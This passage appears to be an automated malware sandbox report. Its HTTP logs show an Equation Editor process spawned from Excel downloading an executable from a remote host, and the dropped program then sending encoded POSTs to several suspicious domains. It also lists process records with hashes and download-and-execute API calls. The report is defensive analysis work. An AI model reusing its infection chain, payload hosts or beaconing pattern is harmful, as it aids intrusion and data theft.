                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 51 30 66 6d 34 79 55 4a 6c 66 77 2b 76 75 30 30 64 66 7a 32 6f 38 6d 58 71 68 50 6e 73 4e 75 43 64 42 71 50 38 4e 43 54 36 54 43 38 72 55 57 30 47 39 63 65 2f 4f 78 49 4d 6d 62 4e 61 4a 7a 76 4e 54 34 4a 68 77 51 6e 78 31 72 69 48 68 4d 6e 55 35 65 41 37 33 54 2f 62 57 4d 61 66 46 49 30 32 6f 6e 50 7a 4e 59 53 41 42 70 56 4e 56 69 67 68 59 54 47 42 77 6c 69 34 47 71 4b 6f 70 48 75 57 49 6f 66 52 61 55 71 4c 45 68 56 66 64 68 4c 79 73 35 56 5a 75 36 58 78 30 53 31 30 54 38 31 49 62 64 42 6a 6d 42 7a 53 4b 54 32 71 36 6f 78 53 75 62 64 65 50 4c 6b 4f 4b 6f 39 59 74 49 30 33 4a 58 4a 67 68 42 68 2f 6b 4a 64 76 51 37 6c 78 33 4b 53 73 75 6b 54 38 48 57 66 6d 61 64 4e 78 52 75 51 68 59 41 78 4c 56 6f 48 33 78 59 36 6f 46 4c 76 6d 37 57 62 76 6c 6b 55 49 32 57 44 4c 5a 53 4d 76 6e 30 4f 51 67 41 2f 59 7a 4b 65 56 44 78 79 64 39 48 33 51 75 48 41 63 35 33 41 79 75 34 57 63 37 39 77 68 4b 63 6f 57 62 30 38 41 69 71 6c 75 55 6e 2f 72 38 61 6b 61 6e [TRUNCATED]
                                                                           Data Ascii: 2PV85pl= [TRUNCATED]
                                                                           Oct 22, 2024 15:01:55.168843985 CEST | 1630 | OUT | Data Raw: 69 2f 46 76 35 71 46 66 45 53 42 46 71 59 50 78 34 37 32 78 48 7a 70 61 56 32 6c 4c 46 5a 46 2b 6a 51 67 58 47 54 41 41 2f 30 4e 58 69 75 44 58 75 63 2f 4a 62 43 6a 7a 50 7a 39 46 57 78 36 4f 6e 75 48 59 69 52 5a 57 74 4e 73 49 64 47 45 7a 4d 44
                                                                          Data Ascii: i/Fv5qFfESBFqYPx472xHzpaV2lLFZF+jQgXGTAA/0NXiuDXuc/JbCjzPz9FWx6OnuHYiRZWtNsIdGEzMDY0tiVFwnxY6gnJhgC70WJUqO2pF5hE13mYLwAyhP/oKtnuYseFzAnhUbTbBrV2UwAtQqMa5VWRxjermivi3SUu+Uj3o1J9MDH9ty28qqqpG3o4bOiVPHiHNZm9LMT2AJPuCEMiavDkiCIsxl9RqISz2ksqT61t6hk
                                                                           Oct 22, 2024 15:01:56.213905096 CEST | 325 | IN | HTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:56 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           6 | 192.168.2.22 | 49168 | 185.196.10.234 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:01:57.699842930 CEST | 419 | OUT | GET /quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.75e296qdx.top
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                           Oct 22, 2024 15:01:58.771230936 CEST | 323 | IN | HTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:58 GMT
                                                                          content-type: text/html
                                                                          content-length: 150
                                                                          x-powered-by: PHP/7.2.30
                                                                          connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           7 | 192.168.2.22 | 49169 | 3.33.130.190 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:02:03.923171043 CEST | 2472 | OUT | POST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 39 4c 41 67 6c 36 6d 6b 35 54 52 4e 6c 47 50 65 50 70 4b 37 6d 58 37 59 4f 52 77 71 2b 73 51 6f 49 46 52 77 76 33 45 70 2b 54 48 7a 6a 71 54 58 56 79 4e 66 33 4c 41 39 67 6c 79 4e 2f 5a 48 4e 35 34 65 65 72 4c 58 47 71 65 45 4e 2b 53 71 73 54 76 4a 61 48 34 32 72 67 39 63 4e 2f 39 6a 75 75 41 41 58 46 2b 6e 70 4a 61 67 6b 4b 43 34 45 4b 76 54 2f 59 36 6b 44 2b 44 46 4e 61 53 6e 42 59 41 69 73 62 6a 47 53 2b 45 36 72 49 73 55 30 6d 64 74 51 51 30 6e 5a 52 6e 7a 78 75 53 32 45 2b 61 7a 67 67 75 30 74 66 66 54 49 55 41 5a 57 6a 36 54 39 4e 48 50 65 64 30 78 73 31 36 59 37 4c 69 6c 65 4d 72 72 4c 6c 68 4b 57 64 52 74 42 75 52 6a 7a 30 31 6b 51 75 39 49 56 65 4b 45 64 5a 57 4e 45 77 70 38 59 67 69 38 32 50 6a 69 6a 51 56 45 6e 4a 51 53 57 63 65 73 49 36 72 4a 6c 75 5a 4f 67 67 50 6b 48 31 56 5a 71 36 59 63 58 4f 49 54 7a 4e 4e 75 74 31 54 39 47 4e 42 76 38 36 35 44 61 4d 42 57 63 6b 55 6d 7a 6f 4e 62 61 62 35 51 72 49 4a 58 4e 51 42 75 76 4d [TRUNCATED]
                                                                           Data Ascii: 2PV85pl= [TRUNCATED]
                                                                           Oct 22, 2024 15:02:03.929507971 CEST | 166 | OUT | Data Raw: 2b 37 72 33 72 79 6a 4d 73 2f 54 55 49 48 7a 4a 37 39 48 77 72 6d 54 6f 69 70 79 30 70 57 72 62 45 61 64 6a 4c 72 79 43 46 77 65 37 44 38 59 41 31 4c 4c 48 2b 65 79 76 51 2f 4b 33 61 2b 76 76 43 2b 6e 52 4c 38 63 56 79 79 6c 67 70 64 76 72 7a 50
                                                                          Data Ascii: +7r3ryjMs/TUIHzJ79HwrmToipy0pWrbEadjLryCFwe7D8YA1LLH+eyvQ/K3a+vvC+nRL8cVyylgpdvrzPFtZ/aSEE0lvmzh89opi/qK0b5mP7vE2JB9XzUTpE0URVOMv7ZMyIClzeuD/YR1xTbN+fPWveWccAL/h50ChM


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           8 | 192.168.2.22 | 49170 | 3.33.130.190 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:02:06.471586943 CEST | 677 | OUT | POST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 36 6e 41 68 30 36 6d 72 35 54 52 4f 6c 47 50 58 76 70 49 37 6d 4b 52 59 50 6c 67 71 4a 49 51 6f 64 35 52 77 39 76 45 6f 2b 54 41 37 44 71 58 4b 6c 7a 51 66 33 4c 71 39 6c 64 79 4e 2b 39 48 4e 63 30 65 63 71 4c 51 4a 36 65 4b 41 65 53 52 73 54 6a 54 61 48 39 39 72 67 56 63 4e 39 5a 6a 76 71 63 41 63 42 65 6e 37 4a 61 6d 6f 61 43 56 45 4b 72 4b 2f 59 4b 37 44 39 6e 46 4e 50 4b 6e 43 4e 30 69 70 4d 66 47 45 4f 45 37 78 34 74 37 6c 45 49 6e 49 51 67 35 55 6e 2b 49 32 2f 75 37 49 74 36 6c 70 32 53 75 6b 4d 4c 37 4f 79 78 79 63 68 76 4a 72 67 3d 3d
                                                                          Data Ascii: 2PV85pl=g+4Fv7u7yXiKo6nAh06mr5TROlGPXvpI7mKRYPlgqJIQod5Rw9vEo+TA7DqXKlzQf3Lq9ldyN+9HNc0ecqLQJ6eKAeSRsTjTaH99rgVcN9ZjvqcAcBen7JamoaCVEKrK/YK7D9nFNPKnCN0ipMfGEOE7x4t7lEInIQg5Un+I2/u7It6lp2SukML7OyxychvJrg==


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           9 | 192.168.2.22 | 49171 | 3.33.130.190 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:02:09.019007921 CEST | 2472 | OUT | POST /2xrt/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.myprefpal.xyz
                                                                          Origin: http://www.myprefpal.xyz
                                                                          Referer: http://www.myprefpal.xyz/2xrt/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw / Data Ascii: (encoded POST form body omitted)
                                                                          Oct 22, 2024 15:02:09.024575949 CEST | 1630 | OUT | Data Raw / Data Ascii: (continuation of the encoded POST form body omitted)


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          10 | 192.168.2.22 | 49172 | 3.33.130.190 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Oct 22, 2024 15:02:11.558645964 CEST | 419 | OUT | GET /2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.myprefpal.xyz
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:02:12.179976940 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 22 Oct 2024 13:02:12 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 263
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.2.22 | 49173 | 15.197.148.33 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Oct 22, 2024 15:02:17.239753962 CEST | 2472 | OUT | POST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw / Data Ascii: (encoded POST form body omitted)
                                                                          Oct 22, 2024 15:02:17.245318890 CEST | 163 | OUT | Data Raw / Data Ascii: (continuation of the encoded POST form body omitted)


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.2.22 | 49174 | 15.197.148.33 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Oct 22, 2024 15:02:19.776103020 CEST | 674 | OUT | POST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw / Data Ascii: (encoded POST form body omitted)


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.2.22 | 49175 | 15.197.148.33 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Oct 22, 2024 15:02:22.326925993 CEST | 2472 | OUT | POST /to3j/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.jilifish.win
                                                                          Origin: http://www.jilifish.win
                                                                          Referer: http://www.jilifish.win/to3j/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw / Data Ascii: (encoded POST form body omitted)
                                                                          Oct 22, 2024 15:02:22.332348108 CEST | 1627 | OUT | Data Raw / Data Ascii: (continuation of the encoded POST form body omitted)


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.2.22 | 49176 | 15.197.148.33 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Oct 22, 2024 15:02:24.866843939 CEST | 418 | OUT | GET /to3j/?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.jilifish.win
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:02:25.498353958 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 22 Oct 2024 13:02:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 263
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.2.22 | 49162 | 192.3.255.145 | 443 | 3448 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-10-22 13:00:48 UTC | 317 | OUT | GET /kontempt2.1.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Connection: Keep-Alive
                                                                          Host: timurtrading.my
                                                                          2024-10-22 13:00:48 UTC | 275 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 22 Oct 2024 13:00:48 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 1320269
                                                                          Last-Modified: Tue, 22 Oct 2024 11:30:02 GMT
                                                                          Connection: close
                                                                          ETag: "67178cba-14254d"
                                                                          X-Powered-By: PleskLin
                                                                          Accept-Ranges: bytes
                                                                          2024-10-22 13:00:48 UTC | 16109 | IN | Data Raw: (hex dump of the first chunk of the downloaded PE body omitted)
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichi
                                                                          2024-10-22 13:00:48 UTC | 16384 | IN | Data Raw / Data Ascii: (nine further 16384-byte chunks of the downloaded PE body omitted)



                                                                          Target ID:0
                                                                          Start time:09:00:22
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                          Imagebase:0x13ffa0000
                                                                          File size:28'253'536 bytes
                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:09:00:42
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543'304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:09:00:48
                                                                          Start date:22/10/2024
                                                                          Path:C:\Users\user\AppData\Roaming\word.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                          Imagebase:0x400000
                                                                          File size:1'320'269 bytes
                                                                          MD5 hash:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:09:00:49
                                                                          Start date:22/10/2024
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                          Imagebase:0xd40000
                                                                          File size:20'992 bytes
                                                                          MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:09:01:14
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe"
                                                                          Imagebase:0x8d0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:09:01:15
                                                                          Start date:22/10/2024
                                                                          Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                          Imagebase:0xc80000
                                                                          File size:303'104 bytes
                                                                          MD5 hash:5F2122888583347C9B81724CF169EFC6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:09:01:27
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe"
                                                                          Imagebase:0x8d0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:12
                                                                          Start time:09:01:42
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x1030000
                                                                          File size:517'064 bytes
                                                                          MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:21.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:71%
                                                                            Total number of Nodes:31
                                                                            Total number of Limit Nodes:3

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • WinExec.KERNEL32(?,00000001,?,036018DE), ref: 036018F3
                                                                              • Part of subcall function 03601906: ExitProcess.KERNEL32(00000000,?,036018FA,?,036018DE), ref: 0360190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: ExecExitProcess
                                                                            • String ID:
                                                                            • API String ID: 4112423671-0
                                                                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                                            • Instruction ID: b58c80ab49252275e8bb25d24c45ca292ca05f046c2658837cd5494fd7c6962b
                                                                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                                            • Instruction Fuzzy Hash: A9F0FF5D90424622CB3CEB7889877EBAB51AF93351FCC8857E8D3042CAD56892C38269

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32 ref: 03601822
                                                                              • Part of subcall function 0360183C: URLDownloadToFileW.URLMON(00000000,0360184D,?,00000000,00000000), ref: 0360189D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: DownloadFileLibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 2776762486-0
                                                                            • Opcode ID: 191eaff5d62e3f1361c8487c46178be6edd8ee0561e645aa6f8810dde95707f6
                                                                            • Instruction ID: 63619fd720018f1c2ad32be7b6a016a7cc5c59e7ca8b9fe2374b260d10709fa7
                                                                            • Opcode Fuzzy Hash: 191eaff5d62e3f1361c8487c46178be6edd8ee0561e645aa6f8810dde95707f6
